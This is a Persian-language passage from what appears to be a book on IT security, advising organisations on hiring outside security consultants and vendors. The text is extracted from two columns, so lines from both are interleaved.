ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺷﺮﻛﺖ ﺛﺎﻟﺚ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺟﺎﻳﮕـﺎﻫﻲ ﻗـﺮﺍﺭ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻓﺮﺍﻣﻮﺵ ﻧﺸﺪﻥ ﻳﻚ ﻣـﺴﺌﻠﻪ ﻣﻬـﻢ ،ﻋﻤﻠﻴـﺎﺕ
ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺳـﻨﮕﻴﻨﻲ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﻭﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ.
ﺁﻭﺭﺩ .ﺣﺘﻲ ﺍﮔﺮ ﻳﻚ ﺷﺮﻛﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻴﺮﻭﻧﻲ ﺑﺴﻴﺎﺭ ﺍﻣﺎﻧﺘﺪﺍﺭ ﺷﺎﻳﺪ ﺧﻮﺩﺗﺎﻥ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻛﺎﺭﺷﻨﺎﺳﺎﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭﻟﻲ ﻧﮕﺮﺍﻥ
ﻭ ﺷﺎﻳﺴﺘﻪ ﺑﺎﺷﺪ ،ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺩﺭ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻱ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﻋﺘﻤـﺎﺩ ﺯﻣﺎﻥ ﻛﻢ ﻳﺎ ﺗﻮﺍﻧﺎﻳﻲ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﺑﺤﺮﺍﻥ ﺑﺎﺷﻴﺪ.
ﻛﻨﻴﺪ ﻭ ﺁﻥ ﻛﺎﺭ ﺑﺼﻮﺭﺕ ﻧﺎﻣﻄﻠﻮﺏ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗـﺎ
ﻣﺎﻫﻬﺎ ﺑﻌﺪ ﻛﻪ ﭘﻴﺎﻣـﺪﻫﺎﻱ ﺁﻥ ﺁﺷـﻜﺎﺭ ﺷـﻮﻧﺪ -ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﺎﻳﺪ ﻱ ﻳﻚ ﺷﺮﻛﺖ ﺑﻪ ﺑﺎﺯﺍﺭ ﺑﺮﻭﻳـﺪ ﭘﺲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺟﻠﺐ ﻫﻤﻜﺎﺭ ﹺ
ﺭﺍﺑﻄﺔ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﺷﺮﻛﺖ ﭘﺎﻳﺎﻥ ﻳﺎﻓﺘﻪ ﺑﺎﺷﺪ -ﻣﺘﻮﺟﻪ ﺁﻥ ﺍﺷـﻜﺎﻝ ﺗﺎ ﭼﻨﺪ ﭘﻴﻤﺎﻧﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ )ﺗﻤﺎﻡ ﻭﻗﺖ ﻭ ﻳﺎ ﭘـﺎﺭﻩ ﻭﻗـﺖ( ﺑـﻪ
ﻧﺸﻮﻳﺪ. ﺍﺩﺍﺭﺓ ﺷﻤﺎ ﺑﻔﺮﺳﺘﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴـﺪ ﺍﺯ ﺧـﺪﻣﺎﺕ
ﺷﺮﻛﺘﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﻭﺍﻛﻨﺶ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ١٠٢ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺗﻨﻬـﺎ
ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻭﻗﺘﻲ ﻳﻚ ﺷـﺮﻛﺖ ﺭﺍ ﺑـﺮﺍﻱ ﻫﻤﻜـﺎﺭﻱ ﺩﺭﻧﻈـﺮ ﺑﺮ ﺍﻣﻨﻴﺖ ﺷﻤﺎ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﺑﺮﻭﺯ ﺍﺷـﻜﺎﻝ ﺑـﻪ ﺷـﻤﺎ
ﻣﻲﮔﻴﺮﻳﺪ ﺑﺎﻳﺪ: ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ.
ﻣﻌﺮﻓﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺷﺎﻳﺪ ﻧﺘﻮﺍﻧﻴﺪ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺗﻤﺎﻡ ﻭﻗﺖ ﺑﻜﺎﺭ ﺑﮕﻴﺮﻳﺪ ﻳـﺎ ﻧﻴـﺎﺯﻱ ﺑـﻪ
ﺑﺪﻧﺒﺎﻝ ﻣﻌﺮﻓﻬﺎﻱ ﺣﺮﻓﻪﺍﻱ ﺑﮕﺮﺩﻳﺪ ﻛﻪ ﺷـﺨﺺ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻲ ﺭﺍ ﭼﻨﻴﻦ ﻛﺴﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ .ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻋﻘـﺪ
ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺧﺪﻣﺎﺗﻲ ﻣﺸﺎﺑﻪ ﺁﻧﭽﻪ ﺷﻤﺎ ﺑﺪﻧﺒﺎﻝ ﺁﻥ ﻫـﺴﺘﻴﺪ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎ ﻳﻚ ﺷﺮﻛﺖ ﻣـﺸﺎﻭﺭﻩ ﻭ ﻧﻈـﺎﺭﺕ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ
ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ. ﺧﺪﻣﺎﺕ ﻛﺎﻣﻞ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻧﻴﺎﺯﺗﺎﻥ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﻛﻨﺪ ﻭ ﻧﻴﺰ ﻣﻘﺮﻭﻥ
ﺑﻪ ﺻﺮﻓﻪﺗﺮ ﺑﺎﺷﺪ.
ﺍﻓﺮﺍﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ
ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﻣﻮﺍﺭﺩ ﻓـﻮﻕ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺑﺪﺍﻧﻴـﺪ
ﺍﮔﺮ ﺍﻓﺮﺍﺩ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﺗﺎﻥ ﺑﻪ ﺷﻤﺎ ﻣﻌﺮﻓﻲ ﺷﺪﻩﺍﻧﺪ ،ﺑـﺎ
ﻧﻴﺎﺯﻫﺎﻳﺘﺎﻥ ﭼﻴﺴﺖ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺁﻥ ﺧﺪﻣﺎﺕ ﺑﻪ ﻛﺪﺍﻡ ﻧﻴﺎﺯﻫﺎﻳﺘـﺎﻥ
ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤﻴﻦ ﻣﺒﺤﺚ ﻭ ﺩﺭ ﺑﺨﺶ "ﺍﻓـﺮﺍﺩ" ﺷـﺮﺡ
ﭘﺎﺳﺦ ﻣﻲﺩﻫﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻫﻤﻴـﺸﻪ ﺳـﺎﺩﻩ ﻧﻴـﺴﺖ ،ﭼﺮﺍﻛـﻪ ﺗـﺎ
ﻣﻲ ﺩﻫﻴﻢ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻛﻨﻴـﺪ .ﺩﺭ ﻣـﻮﺭﺩ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ
ﻭﻗﺘﻲ ﺗﺠﺮﺑﺔ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ﻭ ﻣﺤﻴﻂ ﺍﻃﺮﺍﻑ ﺧﻮﺩ
ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺍﺳﺎﻣﻲ ﺍﻓﺮﺍﺩ ﺩﺭﮔﻴﺮ ﺩﺭ ﭘﺮﻭﮊﺓ ﺷﻤﺎ ﺭﺍ ﺗﺎ ﭘﺮﺩﺍﺧـﺖ
ﺭﺍ ﺧﻮﺏ ﻧﺸﻨﺎﺧﺘﻪ ﺑﺎﺷﻴﺪ ،ﻧﻴﺎﺯﻫﺎﻱ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺭﺍ ﻧﻤﻲﺩﺍﻧﻴﺪ.
ﻗﺴﻂ ﺍﻭﻝ ﻫﺰﻳﻨﺔ ﻗﺮﺍﺭﺩﺍﺩ ﺩﺭ ﺍﺧﺘﻴﺎﺭﺗﺎﻥ ﻗﺮﺍﺭ ﻧﻤﻲﺩﻫﻨﺪ ﻣﺤﺘﺎﻃﺎﻧﻪ
ﻋﻤﻞ ﻛﻨﻴﺪ. ﺍﻧﺘﺨﺎﺏ ﻓﺮﻭﺷﻨﺪﻩ
ﻣﻮﻓﻘﻴﺖ ﺷﻤﺎ ﺩﺭ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻮﺭ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺛﺎﻟﺚ ﺗـﺎ
ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﺗﺪﺍﻡ ﻓﻌﺎﻟﻴﺖ ﺷﺮﻛﺖ ﺭﺍ ﺩﺭ ﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ
ﺣﺪ ﺯﻳﺎﺩﻱ ﺑﻪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻳﺎ ﺍﻓﺮﺍﺩﻱ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺮﺍﻱ
ﺍﮔﺮ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﭘﺮﻭﮊﺓ ﺑﻠﻨﺪﻣﺪﺕ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺴﺘﻪﺍﻳﺪ ﺑﺎﻳـﺪ
ﺍﻳﻨﻜﺎﺭ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩﺍﻳﺪ.
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺷﺮﻛﺖ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺩﺭ ﺗﻤﺎﻡ ﻣـﺪﺕ
ﻝ ﻗﺮﺍﺭﺩﺍﺩ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷـﺖ .ﻣﻨﻈـﻮﺭ ﺍﺯ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺍﻳـﻦ ﻃﻮ ﹺ ﻳﻚ ﺭﺍﻫﻨﻤﺎ ﺑﮕﻴﺮﻳﺪ ﻭ ﺭﻭﻱ ﻣﻌﺮﻓﻬﺎ ﭘﺎﻓﺸﺎﺭﻱ ﻛﻨﻴﺪ
ﻧﻴــﺴﺖ ﻛــﻪ ﺷــﻤﺎ ﻧﺒﺎﻳــﺪ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺧــﺪﻣﺎﺕ ﺷــﺮﻛﺘﻬﺎﻱ
ﺗﺎﺯﻩﺗﺄﺳﻴﺲ ﻣﻮﺍﻓﻘﺖ ﻛﻨﻴﺪ ،ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﻋﻠﺖ ﺗﻨﻮﻉ ﺯﻳﺎﺩ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ،ﻳﻜﻲ ﺍﺯ ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ
ﻣﺮﺑﻮﻃـﻪ ﻭﺍﺟــﺪ ﻣــﺪﻳﺮﻳﺖ ﻭ ﭘـﺸﺘﻮﺍﻧﺔ ﻣــﺎﻟﻲ ﻻﺯﻡ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﻧﻈﺮﺗﺎﻥ ،ﭘﺮﺳﻴﺪﻥ ﺍﺯ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺁﺷـﻨﺎ ﻭ
ﺗﻌﻬﺪﺍﺗﺶ ﻣﻲﺑﺎﺷﺪ .ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﻧﺮﺧﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩﺗﺎﻥ ﻣﻲ ﺑﺎﺷﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻴﺸﻪ ﭘﻴﺪﺍ ﻛـﺮﺩﻥ
ﭘﺎﺋﻴﻦ ﻫﺴﺘﻨﺪ ﺍﺟﺘﻨـﺎﺏ ﻛﻨﻴـﺪ؛ ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﻧﺘﻮﺍﻧﻨـﺪ ﺑـﺎ ﻓـﺮﻭﺵ ﻳﻚ ﻣﻌﺮﻑ ﺧﻮﺏ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴـﺴﺖ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ ،ﻳـﺎ
ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺷﻤﺎ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺧﺮﻳﺪ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺗـﺄﻣﻴﻦ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ﺍﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻧﻤﺎﻳـﺸﮕﺎﻩ ﺗﺠـﺎﺭﻱ ﭘﻴـﺪﺍ
ﻛﻨﻨﺪ ،ﺁﻧﮕﺎﻩ ﺳﻌﻲ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ ﺍﺯ ﺟﺎﻱ ﺩﻳﮕﺮ ﺍﻳﻦ ﭘﻮﻝ ﺭﺍ ﺑﺪﺳﺖ
102 Remote Monitoring and Response Firm
١٦٩ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻗﺎﻧﻮﻥ ﻛﺎﺭ ﻭ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺪﻳﺮﻳﺘﻲ ﻛـﻪ ﺷـﺮﺍﻳﻄﻲ ﺭﺍ • ﺁﻭﺭﻧﺪ ﻭ ﻟﺬﺍ ﺧﺪﻣﺎﺕ ﻫﺮﭼﻨﺪ ﺳﻄﺢ ﺑﺎﻻﻱ ﺁﻧﻬﺎ ﺩﺭ ﺟـﺎﻱ ﺩﻳﮕـﺮ ﻭ
ﭘﻴﺶ ﺑﻴﻨﻲ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬـﺎ ﺍﻓـﺮﺍﺩ ﺩﺍﺧﻠـﻲ ﺑـﺮ ﻋﻠﻴـﻪ ﺷﺎﻳﺪ ﺣﺘﻲ ﺗﺠﺎﺭﺕ ﺩﻳﮕﺮﻱ ﻣﺘﻤﺮﻛﺰ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﻛﺎﺭﻓﺮﻣﺎﻳﺸﺎﻥ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻣﻲﻛﻨﻨﺪ؛
ﻣﺮﺍﻗﺐ ﻓﺮﻳﺒﻜﺎﺭﻳﻬﺎ ﺑﺎﺷﻴﺪ
ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻠﻲ ﻭ ﻣﺤﻠﻲ؛ • ١٠٣
ﺩﺭ ﻣﻮﺭﺩ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻫﻤﻪﺟﺎﻧﺒﻪ ﻛﻪ ﺩﺭ ﺁﻥ ﻳـﻚ ﺷـﺮﻛﺖ ﺑـﻪ
ﻣﺤﺼﻮﻻﺕ ،ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ؛ • ﺗﻨﻬﺎﻳﻲ ﻫﻤـﺔ ﺳﻴﺎﺳـﺘﻬﺎ ﺭﺍ ﺗﻬﻴـﻪ ﻧﻤـﻮﺩﻩ ﻭ ﺑـﺮﺍﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﻭﻳﺮﻭﺳﻬﺎ ،ﻛﺮﻣﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺳﺎﻳﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨـﺮﺏ، • ﺳﻴﺎﺳﺘﻬﺎ ،ﺧﺪﻣﺎﺕ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻻﺯﻡ ﺭﺍ ﻧﻴﺰ ﻣﻲﻓﺮﻭﺷـﺪ ﻣﺮﺍﻗـﺐ
ﻭ ﻫﻤﭽﻨﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﻮﻳﻨﺪﻩ١٠٤؛ ﺑﺎﺷﻴﺪ .ﻣﺎ ﮔﺰﺍﺭﺷـﺎﺗﻲ ﺩﺭﻳﺎﻓـﺖ ﻛـﺮﺩﻩﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺁﻥ ﻧﻴﺎﺯﻫـﺎﻱ
ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﻭ ﻧﻴﺎﺯﻫﺎﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻃﺮﺯ ﻣﺸﻜﻮﻛﻲ ﺑﺮﺍﻱ
ﻲ ﻣﺠــﺎﺯﻱ
ﺍﺻــﻮﻝ TCP/IPﺩﺭ ﺷــﺒﻜﻪﻫــﺎﻱ ﺧــﺼﻮﺻ ﹺ •
١٠٥
ﻫﻤﺔ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﺴﻴﺎﺭ ﻣـﺸﺎﺑﻪ ﻳﻜـﺪﻳﮕﺮ ﺑـﻮﺩﻩ ﻭ ﺩﺭ ﻫﻤﮕـﻲ ﺍﺯ
ﻭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ؛ )(VPNs
ﻱ ﻧﺴﺒﺘﹰﺎ ﻣﺸﺎﺑﻬﻲ ﺍﺳﺘﻔﺎﺩﻩ
ﺳﺨﺖ ﺍﻓﺰﺍﺭ ﭘﺎﻳﻪ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣﺸﺎﻭﺭﻩﺍ ﹺ
ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ ،ﺭﺍﻫﻨﻤﺎﻫﺎ ﻭ ﺧﺪﻣﺎﺕ؛ • ﺷﺪﻩ ﺑﻮﺩ .ﺍﮔﺮ ﺷﻤﺎ ﺷﺮﻛﺘﻲ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﺷﻤﺎ ﺭﺍ ﻣﺤـﺪﻭﺩ
ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺍﻧﺤﺼﺎﺭﻱ ﺑﻠﻨﺪﻣـﺪﺕ ﺑـﺎ ﺧـﻮﺩ ﻧﻜﻨـﺪ ،ﺁﻧﮕـﺎﻩ ﺍﺣﺘﻤـﺎﻝ
ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎ ﻭ ﭘﻴﮕﺮﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ؛ •
ﺑﻴﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﺪﻭﻳﻦﺷﺪﻩ ﺗﻮﺳـﻂ
ﺑﺨﺶ ﺳﻮﻡ
ﺍﻣﻨﻴﺖ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛ ﻭ • ﺁﻥ ﺳﺎﺯﻣﺎﻥ ﻣﻄﺎﺑﻖ ﻧﻴﺎﺯﻫﺎﻱ ﻭﺍﻗﻌـﻲ ﺷـﻤﺎ ﺑﺎﺷـﺪ ﻭ ﻧـﻪ ﻣﻄـﺎﺑﻖ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ،ﺭﻭﺷﻬﺎﻱ ﺭﺳﻤﻲ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ،ﻭ • ﻭﺳﺎﻳﻠﻲ ﻛﻪ ﺁﻧﻬﺎ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﺎﻧﻨﺪ.
ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻮﺭ ﺑﻴﻤﻪ.
ﻫﺮ ﺷﺮﻛﺖ ﺧﺪﻣﺎﺕ ﻣﺸﺎﻭﺭﻩ ﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺧـﻮﺑﻲ ﮔﺴﺘﺮﺩﮔﻲ ﺗﺠﺎﺭﺏ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ
ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺗﻬﻴﻪ ﻛﻨﺪ ﺑﺎﻳﺪ ﭘﺮﺳـﻨﻠﻲ ﺩﺍﺷـﺘﻪ ﺷﻤﺎ ﺑﺎﻳﺪ ﺣﺘﻲﺍﻻﻣﻜﺎﻥ ﺍﺯ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻋﻤﺪﺓ ﺗﺠﺮﺑـﻪ
ﺑﺎﺷﺪ ﻛﻪ ﻃﺎﻟﺐ ﮔﻔﺘﮕﻮ ﺩﺭﺑﺎﺭﺓ ﻣﺒﺎﺣﺚ ﻣﺨﺘﻠﻒ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺁﻧﻬﺎ ﻣﺮﺑﻮﻁ ﻳﻚ ﻧﻮﻉ ﻣﺸﺘﺮﻱ ﻳﺎ ﻳﻚ ﺑﺴﺘﺮ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ
ﻭ ﺑﻮﻳﮋﻩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻥ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﺁﻧﻬﺎ ﺁﻣﺎﺩﻩ ﻭ ﺍﺳﺖ ﻣﺤﺘﺎﻃﺎﻧﻪ ﻋﻤﻞ ﻛﻨﻴﺪ ،ﻣﮕﺮ ﺁﻧﻜﻪ ﻧﻴﺎﺯﻫـﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ
ﻳﺎ ﻗﺎﺩﺭ ﺑﻪ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳـﻦ ﻋﻨـﺎﻭﻳﻦ ﻧﺒﺎﺷـﻨﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﻗﻴﻘﹰﺎ ﺑﺎ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺷﺮﻛﺖ ﻣﺰﺑﻮﺭ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ
ﺍﻧﺘﺨﺎﺏ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻧﺒﺎﺷﻨﺪ. ﻣﻲﺩﻫﺪ ﻣﻄﺎﺑﻘـﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﻳـﻚ ﺷـﺮﻛﺖ
ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺍﺳﺎﺳﹰﺎ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﺭﺍ ﺑﻪ ﺍﺩﺍﺭﺍﺕ
ﺍﮔﺮ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﻧﮕﺮﺍﻧﻲ ﺧﺎﺻﻲ ﺩﺍﺭﻳﺪ ﻛﺎﻓﻴﺴﺖ ﺍﺯ ﺁﻧﻬﺎ ﭘﻠﻴﺲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺳﻴـﺴﺘﻢ Microsoft Windows
ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻳﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻳﻚ ﻣﺸﺘﺮﻱ ﺩﻳﮕـﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﻳﻚ ﺷـﺮﻛﺖ ﺩﺍﺭﻭﻳـﻲ ﻛـﻪ
ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ ﺗﺮﻛﻴﺒــﻲ ﺍﺯ Windowsﻭ Unixﺭﺍ ﺑﻜــﺎﺭ ﮔﺮﻓﺘــﻪ ﺍﻧﺘﺨــﺎﺏ
ﭼﻨﻴﻦ ﺳﻨﺪﻱ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺣﺬﻑ ﺍﺳﻢ ﻭ ﻣﺸﺨﺼﺎﺕ ﻣﺸﺘﺮﻱ ﺑﻪ ﺷﻤﺎ ﻣﻨﺎﺳﺒﻲ ﻧﺒﺎﺷﺪ .ﮔﺴﺘﺮﺓ ﺗﺠﺎﺭﺏ ﺷﺮﻛﺖ ﻣﺸﺎﻭﺭﻩﺍﻱ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ .ﺳﺎﻳﺮ ﺷﺮﻛﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﺸﺘﺮﻳﻬﺎﻳﻲ ﺩﺍﺷـﺘﻪ ﺁﻧﻘﺪﺭ ﻓﺮﺍﮔﻴﺮ ﻧﺒﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺧﺪﻣﺎﺕ ﺳﻴﺎﺳﺘﻲ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ
